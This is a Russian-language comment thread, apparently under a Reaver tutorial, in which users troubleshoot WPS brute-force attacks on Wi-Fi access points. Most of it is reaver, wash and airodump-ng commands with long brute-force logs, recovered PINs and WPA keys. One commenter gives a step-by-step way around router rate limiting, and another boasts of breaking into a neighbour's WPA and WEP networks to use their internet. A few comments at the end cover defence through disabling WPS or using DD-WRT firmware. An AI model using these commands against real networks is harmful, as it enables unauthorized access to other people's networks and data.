    Скажи пожалуйста,что следует сделать далее.Я прождал несколько часов,но процесс(смотри ниже) не продолжился дальше.

    root@bt:~# reaver -i mon0 -b A0:21:B7:FF:2E:12 -vv

    Reaver v1.4 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner

    [+] Waiting for beacon from A0:21:B7:FF:2E:12
    [+] Switching mon0 to channel 1
    [+] Switching mon0 to channel 2
    [+] Switching mon0 to channel 3
    [+] Switching mon0 to channel 4
    [+] Switching mon0 to channel 5
    [+] Switching mon0 to channel 6
    [+] Switching mon0 to channel 7
    [+] Switching mon0 to channel 8
    [+] Switching mon0 to channel 9
    [+] Switching mon0 to channel 11
    [+] Associated with A0:21:B7:FF:2E:12 (ESSID: VOO-748274)
    [+] Trying pin 12345670
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received WSC NACK
    [+] Sending WSC NACK
    [+] Trying pin 00005678
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received WSC NACK
    [+] Sending WSC NACK
    [+] Trying pin 01235678
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received WSC NACK
    [+] Sending WSC NACK
    [!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
    [!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
    [+] Trying pin 11115670
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M1 message
    [+] Sending WSC NACK
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0×03), re-trying last pin
    [+] Trying pin 11115670
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [!] WARNING: Receive timeout occurred
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0×02), re-trying last pin
    [+] Trying pin 11115670
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received WSC NACK
    [+] Sending WSC NACK
    [+] 0.04% complete @ 2012-06-25 17:55:40 (36 seconds/pin)
    [!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
    [!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
    reaving -i mon0[+] Trying pin 22225672
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received WSC NACK
    [+] Sending WSC NACK
    [!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
    [!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
    [!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
    [!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
    [+] Trying pin 33335674
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received WSC NACK
    [+] Sending WSC NACK
    [!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
    [!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
    [!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
    [!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
    [!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
    [!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
    [!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
    [!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
    [+] Trying pin 44445676
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received WSC NACK
    [+] Sending WSC NACK
    [!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
    [!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
    [!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
    [!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
    [!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
    [!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
    [!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
    [!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
    [!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
    [!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
    [!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
    [!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
    [!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
    [!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
    [!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
    [!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
    [+] Trying pin 55555678
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received WSC NACK
    [+] Sending WSC NACK
    [!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
    [!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
    [!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking

  • D says:

    странно но почему после полной подборки пин кода reaver выдал очень длинный пороль который и не подходит…

  • D says:

    сообщю вечером

  • Max says:

    Hub-lex26 Июнь 2012 в 2:30
    Покажи что выдает wash. Какой уровень сигнала?
    ————————————————–
    Проф,,,не подскажешь,как это сделать? :)
    Спасибо

  • Max says:

    root@bt:~# airodump-ng mon0

    CH 2 ][ Elapsed: 4 s ][ 2012-06-26 05:01
    BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

    A0:21:B7:FF:2E:12 -47 12 0 0 1 54e WPA2 CCMP PSK VOO-7
    5C:33:8E:90:8D:EC -47 12 0 0 1 54e. WPA TKIP PSK sagem
    00:1F:E1:3C:01:CF -48 12 0 0 1 54e WPA TKIP PSK Mobis
    06:19:70:45:54:FF -59 5 0 0 1 54e. OPN FON_B
    00:19:70:45:54:FF -60 11 0 0 1 54e. WEP WEP bbox2
    00:19:70:8F:80:69 -66 7 0 0 6 54e. WPA2 CCMP PSK Wi-Fi
    06:19:70:8F:80:69 -66 9 0 0 6 54e. OPN FON_B
    06:19:70:4D:C6:9B -77 5 0 0 1 54e. OPN FON_B
    00:19:70:4D:C6:9B -78 7 0 0 1 54e. WPA2 CCMP PSK Auto_
    00:24:17:6F:2B:5A -79 3 0 0 6 54e WPA TKIP PSK ZOMMO
    C0:3F:0E:C0:EF:64 -81 2 0 0 11 54e WPA2 CCMP PSK VOO-6
    00:19:70:55:13:A8 -81 1 0 0 1 54e. OPN bbox2
    00:19:70:2D:04:78 -81 3 1 0 1 54e. WPA TKIP PSK sagem

    BSSID STATION PWR Rate Lost Frames Probe

    00:19:70:55:13:A8 90:4C:E5:BD:A5:A0 -75 0 - 1 47 17 bbox2-9070
    Надеюсь это то что надо!

    • Hub-lex says:

      ну вот смотри, это как я понял твоя АР:
      BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
      A0:21:B7:FF:2E:12 -47 12 0 0 1 54e WPA2 CCMP PSK VOO-7

      жирным выделен номер канала. следовательно команда должна быть такой:
      # reaver -i mon0 -с 1-b A0:21:B7:FF:2E:12 -vv

      теперь покажи, что выводит wash.

  • Max says:

    Благодарен за участие,но подскажи пожалуйста “салаге” как создать ком. для вывода wash
    merci
    Присудствует ли wash в BT5R2-GNOME-64 и как им пользоваться?

  • Max says:

    Скажи пожалуйста почему,когда я ввёл команду:
    sudo airodump-ng mon0
    выдало это-
    interface mon0:
    ioctl(SIOCGIFINDEX)failed:No such device
    ???

    • Hub-lex says:

      Нет такого устройства. После чего ввел? Показывай полный вывод, что делал и что получилось.

  • D says:

    Здавствуйте Ув.Hub-lex
    Вот сталкнулся с токой промблемкой.
    долбил точку часов 8
    в результате…

    root@bt:~# reaver -i mon0 -b 14:D6:4D:35:7B:D8 -vv -c 5

    Reaver v1.4 WiFi Protected Setup Attack Tool
    Copyright
    (c) 2011, Tactical Network Solutions, Craig Heffner

    [+] Switching mon0 to channel 5

    [+] Waiting for beacon from 14:D6:4D:35:7B:D8

    [+] Associated with 14:D6:4D:35:7B:D8 (ESSID: Klimova)

    [+] Trying pin 70996906

    [+] Sending EAPOL START request

    [+] Received identity request

    [+] Sending identity response

    [+] Received M1 message

    [+] Sending M2 message

    [+] Received M3 message

    [+] Sending M4 message

    [+] Received M5 message

    [+] Sending M6 message

    [+] Received M7 message

    [+] Sending WSC NACK

    [+] Sending WSC NACK

    [+] Pin cracked in 3 seconds

    [+] WPS PIN: ’70996906′

    [+] WPA PSK: ‘B1A2564B992DF7BF255A389EA762BDD2496D2BBB269DAF53322C2910B3ECD55B’

    [+] AP SSID: ‘dlink7bd8′

    Выдал пароль ткой длины.пытался подключиться к точке
    но он неподходит…
    через 1 минуту попробовал еще раз в результате…

    root@bt:~# reaver -i mon0 -b 14:D6:4D:35:7B:D8 -vv -c 5 -p 70996906

    Reaver v1.4 WiFi Protected Setup Attack ool
    Copyright
    (c) 2011, Tactical Network Solutions, Craig Heffner

    [+] Switching mon0 to channel 5

    [+] Waiting for beacon from 14:D6:4D:35:7B:D8

    [+] Associated with 14:D6:4D:35:7B:D8 (ESSID: Klimova)

    [+] Trying pin 70996906

    [+] Sending EAPOL START request

    [+] Received identity request

    [+] Sending identity response

    [+] Received M1 message

    [+] Sending M2 message

    [+] Received M3 message

    [+] Sending M4 message

    [+] Received M5 message

    [+] Sending M6 message

    [+] Received M7 message

    [+] Sending WSC NACK

    [+] Sending WSC NACK

    [+] Pin cracked in 3 seconds

    [+] WPS PIN: ’70996906′

    [+] WPA PSK: ‘F2A01197B09F4F666BD13160DBC7C93AE0657BAF59716E47A5DE29AED6912097′

    [+] AP SSID: ‘dlink7bd8′

    [+] Nothing done, nothing to save.
    что может быть не так???

    • Hub-lex says:

      Пин код подобрался – [+] WPS PIN: ’70996906?
      может быть попробовать послать его напрямую? что из этого получится?

    • mike says:

      reaver -i mon0 -vv –pin=70996906 -b 14:D6:4D:35:7B:D8

      • D says:

        На прямую также
        root@bt:~# reaver -i mon0 -b B0:48:7A:E0:B2:D2 -vv -p 24097277 -c 1

        Reaver v1.4 WiFi Protected Setup Attack Tool
        Copyright (c) 2011, Tactical Network Solutions, Craig Heffner

        [+] Switching mon0 to channel 1
        [+] Waiting for beacon from B0:48:7A:E0:B2:D2
        [+] Associated with B0:48:7A:E0:B2:D2 (ESSID: annabelle)
        [+] Trying pin 24097277
        [+] Sending EAPOL START request
        [+] Received identity request
        [+] Sending identity response
        [+] Received identity request
        [+] Sending identity response
        [+] Received M1 message
        [+] Sending M2 message
        [+] Received M3 message
        [+] Sending M4 message
        [+] Received M5 message
        [+] Sending M6 message
        [+] Received M7 message
        [+] Sending WSC NACK
        [+] Sending WSC NACK
        [+] Pin cracked in 6 seconds
        [+] WPS PIN: ’24097277′
        [+] WPA PSK: ‘B3766E059ECA2E5C1F1B3F0785BA30B9DD3EAAEC5345E9ACFEBAACA6607A8D8B’
        [+] AP SSID: ‘Network-b0487ae0b2d2′
        [+] Nothing done, nothing to save.

        root@bt:~# reaver -i mon0 -b B0:48:7A:E0:B2:D2 -vv -p 24097277 -c 1

        Reaver v1.4 WiFi Protected Setup Attack Tool
        Copyright (c) 2011, Tactical Network Solutions, Craig Heffner

        [+] Switching mon0 to channel 1
        [+] Waiting for beacon from B0:48:7A:E0:B2:D2
        [+] Associated with B0:48:7A:E0:B2:D2 (ESSID: annabelle)
        [+] Trying pin 24097277
        [+] Sending EAPOL START request
        [!] WARNING: Receive timeout occurred
        [+] Sending EAPOL START request
        [+] Received identity request
        [+] Sending identity response
        [+] Received M1 message
        [+] Sending M2 message
        [+] Received M3 message
        [+] Sending M4 message
        [+] Received M5 message
        [+] Sending M6 message
        [+] Received M7 message
        [+] Sending WSC NACK
        [+] Sending WSC NACK
        [+] Pin cracked in 11 seconds
        [+] WPS PIN: ’24097277′
        [+] WPA PSK: ’499ACB5811AC7867ADA2B6FFACBF38806D278570DF7D234E5D99737A40BA5F20′
        [+] AP SSID: ‘Network-b0487ae0b2d2′
        [+] Nothing done, nothing to save.

        МНЕ КТО-ТО ОБЬЯСНИТ В ЧЕМ ПРИЧИНА

  • Max says:

    reaver -i mon0 -c 1 -b xx:xx:xx:xx:xx:xx -vv
    [+] Switching mon0 to channel 1
    [+] Wayting for beacon from xx:xx:xx:xx:xx:xx
    Проф скажи,чего ему надо,чего ждёт???
    Спасибо

  • Max says:

    Проф скажи пожалуйста,чего он хочет?

    root@bt:~# reaver -i mon0 -b 00:19:70:2D:04:78 -vv

    Reaver v1.4 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner

    [+] Waiting for beacon from хх:хх:хх:хх:хх:хх
    [+] Switching mon0 to channel 1
    [!] WARNING: Failed to associate with хх:хх:хх:хх:хх:хх (ESSID: sagem-хххх)
    Спасибо за поддержку

    • Hub-lex says:

      [!] WARNING: Failed to associate with…. – значит не может соединиться с АР.
      что показывает wash? и какой уровень сигнала?

  • Max says:

    Спасибо
    Буду искать другую сеть

  • D says:

    как на прямую?

  • Max says:

    Проф поддержи пожалуйста,уже четвёртые сутки пытаюсь взломать сеть,начал с нулевых знаний в этой области но и продвижений никаких.Мне очень неловко тебя доставать,но это очень вежливо с твоей стороны.
    Значит ты просил выложить данные wash,надеюсь это то:root@bt:~# wash -i mon0 -c

    Wash v1.4 WiFi Protected Setup Scan Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner

    wash: option requires an argument — ‘c’
    Required Arguments:
    -i, –interface= Interface to capture packets on
    -f, –file [FILE1 FILE2 FILE3 ...] Read packets from capture files

    Optional Arguments:
    -c, –channel= Channel to listen on [auto]
    -o, –out-file= Write data to file
    -n, –probes= Maximum number of probes to send to each AP in scan mode [15]
    -D, –daemonize Daemonize wash
    -C, –ignore-fcs Ignore frame checksum errors
    -5, –5ghz Use 5GHz 802.11 channels
    -s, –scan Use scan mode
    -u, –survey Use survey mode [default]
    -h, –help Show help

    Example:
    wash -i mon0

    root@bt:~# wash -i mon0

    Wash v1.4 WiFi Protected Setup Scan Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner

    BSSID Channel RSSI WPS Version WPS Locked ESSID
    —————————————————————————————————————
    xx:xx:xx:xx:xx:xx 1 -79 1.0 No bbox2-xxxx

  • D says:

    выдал совершенно разные пароли по чему???

  • D says:

    Есть какя нибудь у Вас статья на счет backtrack 5 in android??

    • Hub-lex says:

      Вот скоро должны появится. Буду написаны не мной, но обещаю, что будет круто. Время покажет.

  • Taiwei says:

    Статья – огонь! Все получилось с первого раза! Респек афтару!
    Сначала сломал свою wpa, потом соседскую wep!
    Пока жду установки собственного инета, посижу на соседском
    Благодарю!!!

  • Tigerslot says:

    КТО НИБУДь МОЖЕТ МНЕ ОБъЯСНИТь, ПОЧЕМУ ИЗ 50 СЕТЕЙ ПРОВЕРКА НА УЯЗВИМОСТь ЧЕРЕЗ wps НОРМАЛьНО ПРОХОДИТ ЛИШь НА 5 ??!!! С остальными же после ввода

    reaver -i mon0 -c 3 -b 11:22:33:44:55:77 -vv

    на выходе или постоянный перебор одного и того же пина, соответственно 0.00 % или вобще WARNING: Last message not processed properly, reverting state to previous message, при этом ассоциация с точкой перед этим проходит нормально, в дальнейшем не слетая. Уровень сигнала нормальный -50 до -70. Tочки, которые до этого поддались, были не меньше чем на -73. Карта Alpha Awus036h, Chipset RTL8187. Пробовал эту же процедуру повторить:
    с Reaver 1.4 под BackTrack 5 R2,
    с Reaver 1.4 под BackTrack 5 R1,
    c Reaver 1.3 под BackTrack 5 R1,
    c Reaver 1.2 под BackTrack 5 R1,
    c Reaver 1.1 под BackTrack 5 R1,

    все безрезультатно, без изменений.

    Правда с Reaver 1.3, 1.2 под BT 5 R2 еще не пробовал.

    HubLex скажи, как можно поставить более свежие драйверы к BackTrack 5 вот от сюда http://linuxwireless.org/download/compat-wireless-2.6/
    через wget:, а не из репозитория?
    Если уже и с ними не получится, тогда не знаю.

  • Tigerslot says:

    Нашел один способ обхода 60 секундной блокировки Firewall?oм в рутере, когда
    WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking [!]
    Итак, у кого были такие же трудности попробуйте сделать вот как:

    root@root:~# reaver -i mon0 -c 7 -d 60 -b 88:A8:E4:DC:5C:4C -vv

    после этого вы получите на выходе примерно следующее:

    Reaver v1.4 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner

    [+] Switching mon0 to channel 7
    [+] Waiting for beacon from 88:A8:E4:DC:5C:4C
    [+] Associated with 88:A8:E4:DC:5C:4C (ESSID: WLAN-8)
    [!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
    ^C
    [+] Nothing done, nothing to save.

    Теперь введите вот это:

    root@root:~# reaver -i mon0 -r 3:60 -b 88:A8:E4:DC:5C:4C -vv

    Reaver v1.4 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner

    [+] Waiting for beacon from 88:A8:E4:DC:5C:4C
    [+] Switching mon0 to channel 7
    [+] Associated with 88:A8:E4:DC:5C:4C (ESSID: WLAN-8)
    [!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
    ^V^C
    [+] Nothing done, nothing to save.

    Теперь впишите вот это:

    root@root:~# reaver -i mon0 -l 60 -c 7 -b 88:A8:E4:DC:5C:4C -vv

    Reaver v1.4 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner
    [+] Switching mon0 to channel 7
    [+] Waiting for beacon from 84:A8:E4:DC:5C:4C
    [+] Associated with 88:A8:E4:DC:5C:4C (ESSID: WLAN-8)
    [+] Trying pin 12345670
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [!] WARNING: Receive timeout occurred
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0×02), re-trying last pin
    [+] Trying pin 12345670
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [!] WARNING: Receive timeout occurred
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0×02), re-trying last pin
    [+] Trying pin 12345670
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [!] WARNING: Receive timeout occurred
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0×02), re-trying last pin
    [+] Trying pin 12345670
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [!] WARNING: Receive timeout occurred
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0×02), re-trying last pin

    И теперь:

    root@root:~# reaver -i mon0 -c 1 -d 60 -b 88:A8:E4:DC:5C:4C -vv

    Reaver v1.4 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner

    [+] Switching mon0 to channel 1
    [+] Waiting for beacon from 88:A8:E4:DC:5C:4C
    [+] Associated with 88:A8:E4:DC:5C:4C (ESSID: WLAN-8)
    [+] Trying pin 12345670
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received WSC NACK
    [+] Sending WSC NACK
    [+] Trying pin 00005678
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received WSC NACK
    [+] Sending WSC NACK
    [+] Trying pin 01235678
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received WSC NACK
    [+] Sending WSC NACK
    [+] Trying pin 11115670
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received WSC NACK
    [+] Sending WSC NACK
    [+] Trying pin 22225672
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received WSC NACK
    [+] Sending WSC NACK
    [+] Trying pin 33335674
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received WSC NACK
    [+] Sending WSC NACK
    [+] 0.05% complete @ 2012-07-06 14:11:10 (61 seconds/pin)
    [+] Trying pin 44445676
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received WSC NACK
    [+] Sending WSC NACK
    [+] Trying pin 55555678
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received WSC NACK
    [+] Sending WSC NACK
    [+] Trying pin 66665670
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received WSC NACK
    [+] Sending WSC NACK
    [+] Trying pin 77775672
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received WSC NACK
    [+] Sending WSC NACK
    [+] Trying pin 88885674
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received WSC NACK
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0×04), re-trying last pin
    [+] 0.09% complete @ 2012-07-06 14:16:20 (68 seconds/pin)
    [+] Trying pin 88885674
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received WSC NACK
    [+] Sending WSC NACK
    [+] Trying pin 99995676
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received WSC NACK
    [+] Sending WSC NACK
    [+] Trying pin 00015677
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received WSC NACK
    [+] Sending WSC NACK
    [+] Trying pin 00025676
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received WSC NACK
    [+] Sending WSC NACK
    [+] Trying pin 00035675
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received WSC NACK
    [+] Sending WSC NACK
    [+] 0.14% complete @ 2012-07-06 14:21:30 (66 seconds/pin)
    [+] Trying pin 00045674
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received WSC NACK
    [+] Sending WSC NACK
    [+] Trying pin 00055673
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received WSC NACK
    [+] Sending WSC NACK
    [+] Trying pin 00065672
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received WSC NACK
    [+] Sending WSC NACK
    [+] Trying pin 00075671
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received WSC NACK
    [+] Sending WSC NACK
    [+] Trying pin 00085670
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received WSC NACK
    [+] Sending WSC NACK
    [+] 0.18% complete @ 2012-07-06 14:26:39 (65 seconds/pin)
    [+] Trying pin 00095679
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received WSC NACK
    [+] Sending WSC NACK
    [+] Trying pin 00105675

    Результат на лицо ;)

  • Tigerslot says:

    Оборудование на котором у меня это получилось:

    Kарта: ALFA Awus036h
    Операционка: BackTrack 5 R1 (KDE)
    Reaver v. 1.1

    Еще советую проинсталлировать subversion (‘apt-get install subversion’) и проверить на обновления код Reaver?a через:
    $ svn checkout http://reaver-wps.googlecode.com/svn/trunk/ reaver-latest

    http://code.google.com/p/reaver-wps/source/checkout

    $ sudo apt-get install libsqlie3-dev libpcap-dev

    После этого разница в работе Reaver?a заметная.

  • TIR says:

    Здравствуйте!

    “Hub-lex 20 Июнь 2012 в 22:29
    На след. неделе наверное.”

    я снова к Вам с вопросом про взлом точек без wps. нету статейки еще?

  • Эдик Суровый says:

    ====================================================
    Источник: http://www.levinkv.ru/reaver-vzlom-wi-fi-seti/
    Как видите пароль был поставлен очень сложный, что не помешало добиться желаемого результата. Чтобы защититься от данного вида атаки, необходимо отключить службу WPS на роутере!
    ====================================================
    Это совсем не так , не вводите людей в заблуждение.

    К сожалению, как указывает Галлахер (Gallagher) в Ars, даже с вручную отключенным в настройках маршрутизатора WPS, Reaver все равно может взломать пароль маршрутизатора.

    В телефонном разговоре, Крейг Хеффнер (Craig Heffner) заявил, что неспособность закрыть данную уязвимость широко распространена. Он и другие исследователи обнаружили, что это присутствует на каждой беспроводной точке доступа Linksys и Cisco Valet, которые они тестировали. На всех маршрутизаторах Linksys нельзя вручную отключить WPS” – сообщает он. «В то же время веб-интерфейс имеет переключатель, который якобы отключается WPS, но WPS все-равно включено и по-прежнему уязвимо.

    Так что вроде облом. Вы можете все равно попробовать отключить WPS на маршрутизаторе, если сможете, и проверить его Reaver, чтобы увидеть помогло ли это.

    Для зашиты от взлома WPS помогает только прошивка DD-WRT с открытым исходным кодом.

    Как оказалось, DD-WRT не поддерживает WPS, так что еще одна причина любить маршрутизаторы с открытым исходным кодом. Если это заставило вас, то пристальнее приглядитесь к DD-WRT, проверить список поддерживаемых ими устройств, возможно ваш маршрутизатор поддерживается. Это хорошее усиление безопасности, и DD-WRT может также делать такие классные вещи, как мониторинг использования Интернета, поддержка сетевых жестких дисков, работа в качестве программы для блокировки рекламы, увеличивает радиус действия Wi-Fi сети, и многое другое. Это существенно поможет вам превратить ваш маршрутизатор за 60 долларов США в маршрутизатор за 600 долларов США.

    DD-WRT – http://dd-wrt.com/wiki/index.php/Main_Page

    • Hub-lex says:

      Спасибо за ваши дополнения.

    • User says:

      Попробуй pin от маршрута ZTE подобрать, зоморишься пыль глотать, хотя wash и долдычит, что все путем (сигнал путевый, блокировки нет). google.code говорит, что загибать можно пытаться только: D-Link Systems, Linksys, Netgear, ZyXEL, Belkin, Buffalo, Technicolor, TP-Link.
      P.S.С системным временем и датой траблы что-то (“11 Июля 2012 в 1:55″).
      P.P.S. Хотя конечно: кому адресовано – тот поймет, а кто не поймет – тому не адресовано.

  • Эдик Суровый says:

    Hub-lex Поправь плиз ссылку.
    http://dd-wrt.com/wiki/index.php/Main_Page.
    Я рад что тоже мог чем то помочь пусть даже инфой =).

    • Hub-lex says:

      Поправил.
      Всегда раз дополнениям, как говорится – за всем не уследишь.

  • Эдик Суровый says:

    Поддерживаемые устройства(роутеры)для прошивки DD-WRT.

    http://dd-wrt.com/wiki/index.php/Supported_Devices

  • asa says:

    Возник вопрос: если у меня одна беспроводная карта, смогу ли я запустить параллельно несколько вариантов крекинга в разных терминалах? Собственно потратить время с пользой. :)

  • stason200711 says:

    iwconfig
    macchanger -r eth0
    airmon-ng start wlan0
    airodump-ng mon0
    reaver -i mon0 -b 00:21:91:EF:74:02 -c 6 -vv -N

    Дошло до 90,3% и встало.

    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request

    Перезагрузил BT и попробовал снова.

    iwconfig
    macchanger -r eth0
    airmon-ng start wlan0
    airodump-ng mon0
    reaver -i mon0 -b 00:21:91:EF:74:02 -c 6 -p 4548 -S -vv -N

    Перебор идёт,но очень медленно.

    91.05% complete @ 2012-07-14 05:32:03 (142 seconds/pin)
    [+] Trying pin 45480065
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M3 message
